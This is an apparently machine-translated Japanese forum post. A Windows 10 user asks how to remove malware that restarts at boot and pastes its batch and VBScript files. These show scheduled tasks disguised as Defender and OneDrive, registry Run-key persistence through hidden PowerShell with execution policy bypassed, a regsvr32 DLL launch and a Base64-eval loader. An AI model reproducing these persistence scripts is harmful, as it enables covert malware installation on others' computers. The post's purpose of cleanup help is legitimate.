windows 10:ウイルスが変更したものを元に戻し、起動時に開かないようにする方法.

ウイルスを停止するたびにウイルスが停止しなかったためにストレスを受けた後、それをインストールしたプログラムからファイルのチェックを開始しました(アンチウイルスがこれを修正していないため、:()が見つかり、次のことがわかりました:

最初に開くのは、プログラムを実行しようとしたときに開くlauncher.batです.これは次のように動作します:

cd ..&& cd data && cd source && cd data1 && cd data2

xcopy/s/Y data3C:\Users\Public\Music/E/H

cd data3 && cd bin

schtasks/create/tn "onedrive32"/tr "cmd/c start/minC:\Users\Public\Music\bin\java.bat"/sc min/mo 2/F

schtasks/create/tn "WindowsPhotos"/tr "cmd/c start/minC:\Users\Public\Music\bin\ghost.exe"/sc min/mo 33/F

schtasks/create/tn "Defender"/tr "regsvr32.exe/s/i:shellcode、LINK:csC:\Users\Public\Music\bin\64.dll"/sc min/mo 32/F

wscript.exe service.vbs && wscript.exe java.vbs

ghost.exeを起動します

attrib + hC:\Users\Public\Music

終了

「Defender」、「WindowsPhotos」、「onedrive32」を変更します.また、その「ghost.exe」の実行を開始し、githubからのコードのような他のものをインストールします.これをすべて元に戻し、ウイルスとコマンドを停止し、他のファイルも表示したい
C:\Users\Public\Music\bin \ディレクトリにあり、非表示になっています(隠しファイルは常に非表示ではないので、ありがたいことにすべて見つかりました.)

java.vbsの実行:

const CONSOLE_HIDE=0

const CONSOLE_SHOW=1

const CMD_WAIT=true

set O=CreateObject( "Wscript.Shell")

D="HKCU\jaava"

H="cmd/c start/minC:\Users\Public\Music\bin\java.bat"

O.regwrite D、H、 "REG_SZ"

O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cleaner"、U& "cmd.exe/c powershell-ExecutionPolicy Bypass-Windowstyle hidden-command"&chrw(34)& "$ y=(get-itemproperty-path 'HKCU:\'-name 'jaava').jaava; cmd/c $ y "&Chrw(34)、" REG_SZ "

O.Run "powershell-ExecutionPolicy Bypass-Windowstyle hidden-command"&chrw(34)& "$ y =(get-itemproperty-path 'HKCU:\'-name 'jaava').jaava; cmd/c $ y "&Chrw(34)、0、false

Java.batも確認しました:

cdC:\Users\Public\Music\bin && start/min jjs.bat && exit

そしてjjs.bat:

echo eval(new java.lang.String(java.util.Base64.decoder.decode( ''))));|powershell.exe-WindowStyle HiddenC:\Users\Public\Music\bin\svchost.exe

(( '')の内側には、ランダムな文字と数字の非常に長いテキストが入りますが、入れたくありません.何かの助けになるとは思いません)

Service.vbsも確認しました:

const CONSOLE_HIDE=0

const CONSOLE_SHOW=1

const CMD_WAIT=true

set O=CreateObject( "Wscript.Shell")

D="HKCU\alien34"

H="regsvr32.exe/s/i:shellcode、LINK:csC:\Users\Public\Music\bin\64.dll"

O.regwrite D、H、 "REG_SZ"

O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\onedrive32"、U& "cmd.exe/c powershell-ExecutionPolicy Bypass-Windowstyle hidden-command"&chrw (34)& "$ y =(get-itemproperty-path 'HKCU:\'-name 'alien34').alien34; cmd/c $ y"&Chrw(34)
、「REG_SZ」

O.Run "powershell-ExecutionPolicy Bypass-Windowstyle hidden-command"&chrw(34)& "$ y =(get-itemproperty-path 'HKCU:\'-name 'alien34').alien34; cmd/c $ y "&Chrw(34)、0、false

他に確認する必要がある場合は、教えてください.他に見つけた場合はコメントで投稿します